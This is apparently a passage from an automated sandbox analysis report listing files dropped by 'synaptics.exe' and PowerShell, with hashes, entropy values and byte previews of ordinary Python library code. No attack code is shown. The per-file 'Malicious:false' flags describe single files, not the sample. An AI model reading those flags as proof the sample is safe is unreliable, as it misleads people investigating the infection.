                                                                                                                                                                                                            Preview:o.........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....d.d.g.Z.d.e.d.e.f.d.d...Z.d.d.g.Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.e...d.e.f.d.d...Z...........d!d.e.d.e.d.e.e...d.e.d.e.e...d.e.e...d.e.d.e.f.d d...Z.d.S.)".....N)...Optional)...unquote..urlparse.....)...WebSocketProxyException..parse_url..get_proxy_info..url..returnc....................C...s....d.|.v.r.t.d.....|...d.d...\.}.}.t.|.d.d...}.|.j.r.|.j.}.n.t.d.....d.}.|.j.r)|.j.}.d.}.|.d.k.r4|.s3d.}.n.|.d.k.r?d.}.|.s>d.}.n.t.d.|.......|.j.rL|.j.}.n.d.}.|.j.rY|.d.|.j.....7.}.|.|.|.|.f.S.).z.. parse url and the result is tuple of. (hostname, port, resource path and the flag of secure mode).. Parameters. ----------. url: str. url string.. ..:z.url is invalidr......http)...schemez.hostname is invalidr....F..ws.P.....wssTi....z.scheme %s is invalid../..?)...ValueError..splitr......hostname..port..path..query).r....r......parse
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4096
                                                                                                                                                                                                            Entropy (8bit):4.086461551356513
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:qxFBpqD0qxy3vxQkJxriXOTwJSPe1IHcO6GA9PYR:qxFBpo0Wy+k/rUOTOSP+IP6GnR
                                                                                                                                                                                                            MD5:3F12152E1CC2563ED6D53E170D60D408
                                                                                                                                                                                                            SHA1:3D97EAC3B1454FA39C771578FC7BEFFACD3704BE
                                                                                                                                                                                                            SHA-256:34EE83C2D4071AB26D2DCA2856E105BEE63B4910DFC74F71EF936AEFFC8DB2F9
                                                                                                                                                                                                            SHA-512:0D8E2F33C0EC5E6820CFC3FCBF7AB4529ACFA73D5A7C61D162EFF0A820467A613C87CB991EC77C59F28FD923DC394E01772BA5DEEB3897CC6D92BE6054F40A2D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g1........................@...s....d.d.l.m.Z.....g.d...Z.G.d.d...d...Z.z.d.d.l.m.Z...d.e.e.e.f...d.e.f.d.d...Z.W.n+..e.yR......d.Z.d.Z.g.d...Z.d.e.d.e.d.e.d.e.f.d.d...Z.d.e.e.e.f...d.e.f.d.d...Z.Y.n.w.d.e.e.e.f...d.e.f.d.d...Z.d.e.d.e.e.d.f...f.d.d...Z.d.e.d.e.e.d.f...f.d.d...Z.d.S.)......)...Union)...NoLock..validate_utf8..extract_err_message..extract_error_codec....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.).r......returnNc....................C........d.S...N..)...selfr....r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\_utils.py..__enter__...........z.NoLock.__enter__c....................C...r....r....r....).r......exc_type..exc_value..tracebackr....r....r......__exit__....r....z.NoLock.__exit__).r....N)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....)...Utf8Validator..utfbytesr....c....................C...s....t.....|...d...}.|.S...Nr....).r......validate).r......resultr....r....r......
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1972
                                                                                                                                                                                                            Entropy (8bit):5.040599139101866
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:1HbDS1SV2Iv5bEh0pVZj1O4MGVYpVCh9HxrVYX0OafVYsarVYHD:xus3vJEOZjDMGKK9H1IYf3CkD
                                                                                                                                                                                                            MD5:4998D6EF0CE99335A30C578AB3946051
                                                                                                                                                                                                            SHA1:55CCFE9E9AC9BA2F46BA518989EFF1D8BCEEB873
                                                                                                                                                                                                            SHA-256:5CBAD2253975756EEC2F0B3311CA517783EC97A8CC422902F1BA55BE9AC0B6F9
                                                                                                                                                                                                            SHA-512:57906D411EBCFAC1D47953D71DD789570C46405909204A3E31AF22F7EB55DF6AE641E1548B182CA0E6B67733C98630032F31B1CFAB980445FF793A8C9AD4D051
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import win32api..import win32con..import win32transaction....keyname = "Pywin32 test transacted registry functions"..subkeyname = "test transacted subkey"..classname = "Transacted Class"....trans = win32transaction.CreateTransaction(Description="test RegCreateKeyTransacted")..key, disp = win32api.RegCreateKeyEx(.. win32con.HKEY_CURRENT_USER,.. keyname,.. samDesired=win32con.KEY_ALL_ACCESS,.. Class=classname,..)..## clean up any existing keys..for subk in win32api.RegEnumKeyExW(key):.. win32api.RegDeleteKey(key, subk[0])....## reopen key in transacted mode..transacted_key = win32api.RegOpenKeyTransacted(.. Key=win32con.HKEY_CURRENT_USER,.. SubKey=keyname,.. Transaction=trans,.. samDesired=win32con.KEY_ALL_ACCESS,..)..subkey, disp = win32api.RegCreateKeyEx(.. transacted_key,.. subkeyname,.. Transaction=trans,.. samDesired=win32con.KEY_ALL_ACCESS,.. Class=classname,..)....## Newly created key should not be visible from non-transacted handle..subke
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2134
                                                                                                                                                                                                            Entropy (8bit):5.153432521904746
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:0Xh1P7MOFoF/n0K7iSbh2Nv98Q+Pc8p4+2KrvgwvO8tsX7:AP7tFoF/zXbKvuQ+Pzp4+2KrIwvZtsX7
                                                                                                                                                                                                            MD5:DF498DB3F44807DDBA432AFDFF2B32FE
                                                                                                                                                                                                            SHA1:CF05C079AE9A5E5C9F4B24A3AC0F825C647EBB19
                                                                                                                                                                                                            SHA-256:2DACF6D0369B7A5ACFBB607E7A5A361CA1D58A526D79A1D1886F3BB72E7556A1
                                                                                                                                                                                                            SHA-512:061BA95D7519A35860C000984D5C8E31015045346359CF1125E486476767A28AB4D80C0009A743B44299107EDEB92AAA5D23292E389BACCEF56DC9C2D41386F8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import os....import ntsecuritycon..import win32api..import win32con..import win32security..import winnt....temp_dir = win32api.GetTempPath()..fname = win32api.GetTempFileName(temp_dir, "rsk")[0]..print(fname)..## file can't exist..os.remove(fname)....## enable backup and restore privs..required_privs = (.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_BACKUP_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),..)..ph = win32api.GetCurrentProcess()..th = win32security.OpenProcessToken(.. ph, win32con.TOKEN_READ | win32con.TOKEN_ADJUST_PRIVILEGES..)..adjusted_privs = win32security.AdjustTokenPrivileges(th, 0, required_privs)....try:.. sa = win32security.SECURITY_ATTRIBUTES().. my_sid = win32security.GetTokenInformation(th, ntsecuritycon.TokenUser)[0].. sa.SECURITY_DESCRIPTOR.SetSecurityDescriptorOwner(my_sid, 0)....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8162
                                                                                                                                                                                                            Entropy (8bit):5.423069106791512
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:KV/EoD6y7I//GA6TfGwBhvhNbCDhxnhQ9:KV8ID0//2OwBhvhNeDhxnhQ9
                                                                                                                                                                                                            MD5:80D2E8770D9166EB41E00E8F841DD451
                                                                                                                                                                                                            SHA1:12675BF9F2928BAE8C353E11C014822176390745
                                                                                                                                                                                                            SHA-256:47C37A9BF24B04DE18EFB9B983EDE982B484C753DFE3F55F6A064E2D94C66597
                                                                                                                                                                                                            SHA-512:07D570159D8AE5143F7CAFA3DAA5AAA581DA6A66D67913FD6459977452F4584BF1CF373D07EB4498D155F148D20D24DEBCE19E78F1C1E142C88FBA97613CFE59
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import glob..import os..import time....import win32api..import win32con..import win32gui....## some of these tests will fail for systems prior to XP....for pname in (.. ## Set actions all take an unsigned int in pvParam.. "SPI_GETMOUSESPEED",.. "SPI_GETACTIVEWNDTRKTIMEOUT",.. "SPI_GETCARETWIDTH",.. "SPI_GETFOREGROUNDFLASHCOUNT",.. "SPI_GETFOREGROUNDLOCKTIMEOUT",.. ## Set actions all take an unsigned int in uiParam.. "SPI_GETWHEELSCROLLLINES",.. "SPI_GETKEYBOARDDELAY",.. "SPI_GETKEYBOARDSPEED",.. "SPI_GETMOUSEHOVERHEIGHT",.. "SPI_GETMOUSEHOVERWIDTH",.. "SPI_GETMOUSEHOVERTIME",.. "SPI_GETSCREENSAVETIMEOUT",.. "SPI_GETMENUSHOWDELAY",.. "SPI_GETLOWPOWERTIMEOUT",.. "SPI_GETPOWEROFFTIMEOUT",.. "SPI_GETBORDER",.. ## below are winxp only:.. "SPI_GETFONTSMOOTHINGCONTRAST",.. "SPI_GETFONTSMOOTHINGTYPE",.. "SPI_GETFOCUSBORDERHEIGHT",.. "SPI_GETFOCUSBORDERWIDTH",.. "SPI_GETMOUSECLICKLOCKTIME",..):.. print(pname).. cget =
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2905
                                                                                                                                                                                                            Entropy (8bit):6.025357762086652
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CsZ/UGqSoZ9RuBTSBSt5X4OMtpQ/GD12GF0zdxfJWwd3IqGw9BOfh2MXjUCYZp:CsiGqSoz4UBSToGC2GF0DJWweqx9SFUD
                                                                                                                                                                                                            MD5:5641E6EFD415578CE5BE289D58096A7B
                                                                                                                                                                                                            SHA1:238B267B33EEDECD4881BC304E3FEABB24AA1EAE
                                                                                                                                                                                                            SHA-256:A165ED483FC6451CCF6DFAA2BD9D6192265C1C5F2504C783A221E93F25613EAD
                                                                                                                                                                                                            SHA-512:26D51FC5DBD72053956AE5D1EB02391437AEAEF0AD6ECEC5D4578ACC0958243870821F417A56CA72C1884A3F3280C58EF92A9D5C5DB73A21B2153D44CD06FABB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sp...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.j.e.j.B.e.j.B.e.j.B.Z.e.....Z.e...e.d...d...Z.e...e.d...d...Z.e.d.e.d.e.....e.e.d...Z.e...d.....e.......e.e.d...d...Z.e...d.....e.......e.e.d...d...Z.e...d.....e.......e.j.e.j.B.e.j.B.Z.e...e.e.e.j.d.e.j.d...Z.e...e.j e.j!d.e.j.e.j.B...Z"e".#e.j$e.j%f.d.....d.Z"d.Z.e..&..Z'e..(d.d...d...Z)e..*..Z+e+.,d.e.j-e)....e+.,d.e.j.e)....e+.,d.e.j/e)....e+.,d.e.j0e)....e'.1d.e+d.....e..2e.e.j.e'....e..3..Z4d.e4_5e..6e.e.j7e.j8e4e.j9e.j:d...Z;e..6e.e.j7e.j8e.j<B.e4e.j9e.j:d...Z=d.Z>d.Z?d.Z@d.ZA..e..Be;eAe@d.d.e>..\.ZCZ@Z>eCd.k...r+n.e..De=eCe@d.d.e?..\.ZEZ?e.d.eEd.e?......q.e..Be;d.e@d.d.e>....e..De=d.d.d.d.e?....e..Fe;....e..Fe=....e.e....G..e.e....G..k...soJ.d.....e.e.d......G..e.e.d......G..k...s.J.d.....e.e.d......G..e.e.d......G..k...s.J.d.....eHe..Ie.e.....d.d.....eHe..Ie.e.....d.d.....k...s.J.d.....d.S.)......N)...storageconZ.bkr..outz.Filename:z.Output file:..wztsome random
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3051
                                                                                                                                                                                                            Entropy (8bit):5.909635395497281
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CVLZGAq+2fEKVVs9S4zs7X4KMNamXK9ImpGixfD29matG6Vsngx7oCLCSMgN+ZFc:CVLkbsWBohKVpGivuGieF0yesOU+
                                                                                                                                                                                                            MD5:EA3B37290E5B7EEF458CC7050412AF47
                                                                                                                                                                                                            SHA1:4CA4D0F28A9016AE00E43FD19AEB7BDC836ABFA0
                                                                                                                                                                                                            SHA-256:FE31D4C71EFBC2157512E74A68D558860AC686BC45B8992C59929CA3FFAC5CA9
                                                                                                                                                                                                            SHA-512:D54D5C2D81D6D9DF7893256C89B6592CB4C12D697963D778DD3BA55EBF626997A4F0706BFC5E5B206D6A5157572A54D159F8880A36C36F022C101CC30F7BA828
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.j.d.e.j.d.e.j.d.e.j.d.e.j.d.e.j.d.e.j.d.e.j.d.e.j.d.i.Z.e.....Z.e...e.d...d...Z.e.d.e.....e.e.d...Z.e...d.....e.......e.e.d...d...Z.e...d.....e.......e.e.d...d...Z.e...d.....e.......e.j.e.j.B.e.j.B.Z.e...e.e.e.j d.e.j!d...Z"e".#e.j$e.j%d.e.j.e.j.B...Z&e&.'e.j(e.j)f.d.....d.Z&d.Z"e..*..Z+d.e+_,e..-e.e.j.e.j/e+e.j0e.j1d...Z2..d.Z3e..4e3..Z5d.d...Z6d.Z7d.Z8..e..9e2e5e8d.d.e7..\.Z:Z8Z7e:d.k.r.n"e6e2e7e8d.d.......\.Z7Z;Z<Z=Z>Z?e=d.k...r.e..@e2e=e7..ZAe.d.eA....q.e..9e2e5e8d.d.e7....e..Be2....d.S.)......N)...storageconz.Standard dataz.Extended attribute dataz.Security descriptor dataz.Alternative data streamsz.Hard link informationz.Property dataz.Objects identifiersz.Reparse pointsz.Sparse fileZ.bkrz.Filename:..wztsome random junkxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxz.:streamdataz.data written to alternate streamyyyyyyyyyy
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1092
                                                                                                                                                                                                            Entropy (8bit):5.609418137780079
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:C3txtWvwUaMtOizmWQnlZX2oG5Q2B6Jliwm0:C3t/WIUN7zHQlZX2oG5DB6JliM
                                                                                                                                                                                                            MD5:7D830C3FA16E6AA5DC370051FF6D8A6F
                                                                                                                                                                                                            SHA1:B1488016C5CA3751D17F960EF42BF0D2AFAA27FA
                                                                                                                                                                                                            SHA-256:BBF46663691373AC3CB89C65BEE87C9F8EA11A3971DE9583B08F8A1911222F93
                                                                                                                                                                                                            SHA-512:DF542B8BC2E0C722854D4D47B9A8F7CF5931CD9394D7A7CCD5FF0B0D29CA602C9EF3171853A1ACB53EA1B0573834ECEA544DF4F681A3C792B16F8E3D5B46B914
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d...Z.e.....Z.e...e.d...d...Z.e...e.d...d...Z.e.e.e.....e.e.d...Z.e...d.d.......e.......e.e.d...d...Z.e...d.d.......e.......e.e.d...d...Z.e...d.d.......e.......d.e...d...e...Z.e.j.e.e.e.e.d.e.j.d.d.....d.S.)......Nc....................C...s$...t.|.....t.|.|.|.|.|.|.|.|.....t.j.S.).N)...print..win32fileZ.PROGRESS_CONTINUE).Z.TotalFileSizeZ.TotalBytesTransferredZ.StreamSizeZ.StreamBytesTransferredZ.StreamNumberZ.CallbackReasonZ.SourceFileZ.DestinationFile..Data..r.....mC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/CopyFileEx.py..ProgressRoutine....s............................r....Z.cfe..wz.xxxxxxxxxxxxxxxx.i....z.:stream_yz.yyyyyyyyyyyyyyyy.z.:stream_zz.zzzzzzzzzzzzzzzz.z.Copying z. to F).r....Z.CancelZ.CopyFlagsZ.Transaction).Z.win32apir....r....Z.GetTempPath..temp_dirZ.GetTempFileName..fsrc..fdstr......open..f..write..closeZ.operation_descZ.CopyFileExZ.COPY_FILE_RESTARTABL
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2545
                                                                                                                                                                                                            Entropy (8bit):5.927453871071043
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:C6ddbP39YbBRD3F//po1Iozo7NffBctIGg4NMYKIY5/Ngx2+E+VEXc99CESAR:CsP3mbBRbF/+TE7Zf2CuKI0/N1+VEs9n
                                                                                                                                                                                                            MD5:8BA1E76A9B332CABD0B4BF6DB45FB6EC
                                                                                                                                                                                                            SHA1:F8F146EE02424268450224FB5B76BDAB2C0380A7
                                                                                                                                                                                                            SHA-256:DCE431BD11469B33AF00D7C29EAB8ECA9D0C5F6836BCB1649DE7F2D251144DF8
                                                                                                                                                                                                            SHA-512:573AAEC61EC42A3FC9E78864B591B1CBAB517C3B4AD64551F0585A5E225EF6994E901AEFA83199452970C70C97593069F21EAB080D95758B65639463FBA0A0BF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e.d.k.rQz.e.....W.d.S...e.j.yP..Z...z.e.j.e.j.k.rDe.d.....n...W.Y.d.Z.[.d.S.d.Z.[.w.w.d.S.).z..This demonstrates the creation of miniversions of a file during a transaction..The FSCTL_TXFS_CREATE_MINIVERSION control code saves any changes to a new.miniversion (effectively a savepoint within a transaction).......Nc....................C...s....d.}.t...|...}.t.....}.t...|.d...d...}.t.d.|.....t.|.d...}.|...d.....|.......t.j.d.d...}.t.j.|.t.j.t.j.B.t.j.t.j.B.d.t.j.d.d.|.d...}.t...|.d.....t...|.t.j.d.|.d...}.t...|.|...\.}.}.}.}.t...|.d.t.j.....t...|.d.....t...|.t.j.d.|.d...}.t...|.|...\.}.}.}.}.|.......t.j.|.t.j.t.j.t.j.B.d.t.j.d.d.|.|.d...}.t.d.|.t...|.d.......|.......t.j.|.t.j.t.j.t.j.B.d.t.j.d.d.|.|.d...}.t.d.|.t...|.d.......|.......t.j.|.t.j.t.j.t.j.B.d.t.j.d.d.|.|.d...}.t.d.|.t...|.d.......|.......t...|.....t...|.....d.S.).z.. Definition of buffer used with FSCTL_
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1889
                                                                                                                                                                                                            Entropy (8bit):5.79499134554225
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Cmtw9J1HS/o9p2ewF3TVX9YKUrVcY+21K7Jvj:C3J1HEo9p2ewFjbYKUrCWK7Jj
                                                                                                                                                                                                            MD5:E6AF1EEB17BE6191358C7A88FB1424F1
                                                                                                                                                                                                            SHA1:674C10EF3593651C226A8069DF81A37EB2D116C3
                                                                                                                                                                                                            SHA-256:4668878B9FD12A70BEF95B88705A73B50619D1B54C869D42E9AB53B70477C1A0
                                                                                                                                                                                                            SHA-512:1F8F38CEE8B2D082C6709E83EA19423ED19B3C1C80E26E19A059984B58B05FB701FD146DCA92C0BE6B0FAE2E18A8D8171E1C007AC04A10F5AE121F3FAB3132A6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gK........................@...s....d.d.l.Z.d.d.l.Z.d.d...Z.e.d.k.r.e.....d.S.d.S.)......Nc....................C...s....d.}.d.}.t.t.j...d.k.r.t.j.d...}.t.t.j.d.....}.n.t.t.j...d.k.r$t.j.d...}.t...|.t.j...}.t...|.|...}.t...t.j...}.t.|.d...D.].\.}.}.t.j.|.t.j.|.d...}.t.d.|.........|.t.j...\.}.}.|.t.j.k.r.|.d.k.ret.d.....n(|.d.k.rnt.d.....n.|.d.k.rwt.d.....n.|.d.k.r.t.d.....n.|.d.k.r.t.d.....n.t.d.....|.t.j...\.}.}.|.t.j.k.r.t.d.|.............|.t.j...\.}.}.|.t.j.k.r.t.d.|.........|.t.j...\.}.}.|.t.j.k...r.t.d.|.........z.t...|...}.W.n...t.y.......Y.q<w.z.t...|.|.t.j...}.W.n...t.y.......Y.q<w.z.t.d.|.........W.q<..t...y.......t.d.t.|.......Y.q<w.q<d.S.).N..System...............)...Contextz.Event z. Level: CRITICALz. Level: ERROR.....z. Level: WARNING.....z. Level: INFOz. Level: VERBOSEz. Level: UNKNOWNz. Timestamp: z. FQDN: z. Provider: z. Message: z. Failed to decode:)...len..sys..argv..int..win32evtlogZ.EvtQueryZ.EvtQueryForwardDirectionZ.EvtNextZ.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):726
                                                                                                                                                                                                            Entropy (8bit):5.758727174980086
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C1ZyGTZIeOHEzaJr+937U1ZpUVJKMRLQfzbpF+Gpn/2IaTI80nbQwj:CWEzaJr+90UVJXR0fzbpZ/2p4kwj
                                                                                                                                                                                                            MD5:A0A633FA2A121741BD64DCF254C8A021
                                                                                                                                                                                                            SHA1:CD53C0D714CA75BD8B83E1B12CF1B962A9502C64
                                                                                                                                                                                                            SHA-256:0E3CBE2D364D42AFC5E025CB98E4C3C15BE3933198FC2444A9D835AF29D59D0C
                                                                                                                                                                                                            SHA-512:B217AA9773FA9960C60D38A32C76B9D2751FAC5976A5506ECC3A301EC7F9ED5CBF0D343997A14883A3FB4D4DCD39CF0B3025CAD2EEEE9C258D691509E0E6E45D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g4........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.e...d.d.d.d...Z.e.j.d.e.j.e.e.d...Z.....e...e.d...Z.e.e...d.k.r/n.e.d.e.e.........q"..e.d.....e...e.d.d...Z.e.e.j.k.rJn.q9q!)......Nz7*[System[Provider[@Name="Microsoft-Windows-Winlogon"]]]..System).Z.SignalEventZ.Query..........z.retrieved %s eventsz.waiting...i....T).Z.win32conZ.win32event..win32evtlogZ.query_text..CreateEvent..hZ.EvtSubscribeZ.EvtSubscribeStartAtOldestRecord..sZ.EvtNext..events..len..printZ.WaitForSingleObjectEx..w..WAIT_OBJECT_0..r....r.....tC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/EvtSubscribe_pull.py..<module>....s2.....................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):782
                                                                                                                                                                                                            Entropy (8bit):5.487258890764096
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:CumJr+94tC3GhRfzHN1D3evJk2iZDYgEdI:Chr+9oGGhRf7N1D3evS24kdI
                                                                                                                                                                                                            MD5:0307569ADF07C069B9EADA4151749137
                                                                                                                                                                                                            SHA1:4092DFDB6AC0BC0C8265D54B060A2CD67E8FE20B
                                                                                                                                                                                                            SHA-256:C146AF4ABE645BFE566EC359E11C271DD9633103FF22FE9B79AA8414FA33E13F
                                                                                                                                                                                                            SHA-512:0EC100CBF400835FB8E9298A9E93B7B33148BEDE333C031D181537E17AFD3C6306F6EDCFEC96913E027BBF55E1C23A5EF26403ECED792D66B87F80AC77CCBF37
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s2...d.d.l.Z.d.Z.d.d...Z.g.Z.e.j.d.e.j.d.e.e.d...Z.d.S.)......Nz7*[System[Provider[@Name="Microsoft-Windows-Winlogon"]]]c....................C...sJ...|.t.j.k.r.t.d.....n.|.t.j.k.r.t.d.....n.t.d.|.....|...t...|.t.j.......d.S.).N..EvtSubscribeActionError..EvtSubscribeActionDeliverz.??? Unknown action ???r....)...win32evtlogr......printr......appendZ.EvtRenderZ.EvtRenderEventXml)...reason..contextZ.evt..r.....tC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/EvtSubscribe_push.py..c....s..................r......System..*).Z.QueryZ.Callback..Context).r....Z.query_textr....Z.evttextZ.EvtSubscribeZ.EvtSubscribeStartAtOldestRecord..sr....r....r....r......<module>....s..........................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2486
                                                                                                                                                                                                            Entropy (8bit):6.034078831270836
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:C52rbNkNmt3N59NeY2g24OaYKQ5x413w7D+x9igFpOwJ2s8uii0uf:C5QbNkNC5t2uYJxww2x9jVaud
                                                                                                                                                                                                            MD5:409F5A9BDC9999F6D73721D107452680
                                                                                                                                                                                                            SHA1:5BF9461936F4ABA0B7048885641955DCFD50FA19
                                                                                                                                                                                                            SHA-256:9D21897A0179913088665975D3496464392B636A67210E79C1D01AF127FEB2A7
                                                                                                                                                                                                            SHA-512:CB3AB8B61823273DD1838237991522DA50BD66D83AA234B9C9996143663D95B0ABDDD3013A671A08FB808712438D62B1BC4A30FFF458F7D8A0D51799FB2539DC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.d...Z.e.j...e...s,e.e.d.....e.......e.d.e.d.....e.d.....z.e...e.e.j...Z.e.....Z.e.d.e...d.e.......W.n...e.j.yj..Z...z.e.j.e.j.k.r\..e.d.....W.Y.d.Z.[.n.d.Z.[.w.w.z.e.d.....e...e.e.j...Z.e.....Z.e.d.e...d.e.......W.n...e.j.y...Z...z.e.j.e.j.k.r...e.d.....W.Y.d.Z.[.n.d.Z.[.w.w.e...e.e.j...Z.e.....Z.e.d.u.r.e.d.....d.S.e.d.e.......D.].Z.e...e...Z.e.d.e.....e.d.....d.D.].Z.e e.e...e.d...d...k.r.e.d.e.....q.e.d.e!e.d...d.........d.D.].Z.e e.e...e.d...d...@.e e.e...k...r.e.d.e.....q.e.d.e!e.d.........d.Z"d.Z#d.Z$e.j..%e.....r$e"Z&n.e#Z&e.d...d...e.j'@.e.j'k...rBe.d...d...e.j(@.e.j(k...rBe$Z&d.Z)e&D.].Z.e e.e...e.d...@.e e.e...k...rce)e e.e...O.Z)e.d.e.......qFe.d.d.e!e)......e.d.e...d.e.d.........q.d.S.)......Nz.does not exist!z.On file ...Z.OWNERz. z!No owner information is availableZ.GROUPz!No group information is availablez.No Discretionary ACLZ.ACEz. -Type).Z.ACCESS_ALLOWED_ACE_TYPEZ.ACCES
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1047
                                                                                                                                                                                                            Entropy (8bit):5.764605509542169
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C1CZTQ7EFFD3CrT8S7EFf3CrxV8vMdRxrCr0QQTxEfWGAqm/sJDW42Lno5ideY1V:CPCFbCCPe3r60QQmHAB0cLnxv022DTho
                                                                                                                                                                                                            MD5:B9536B6DCD6F472C42BB348F56D64A78
                                                                                                                                                                                                            SHA1:BB538515212B634BDD294F509D4C44F7DCA45B25
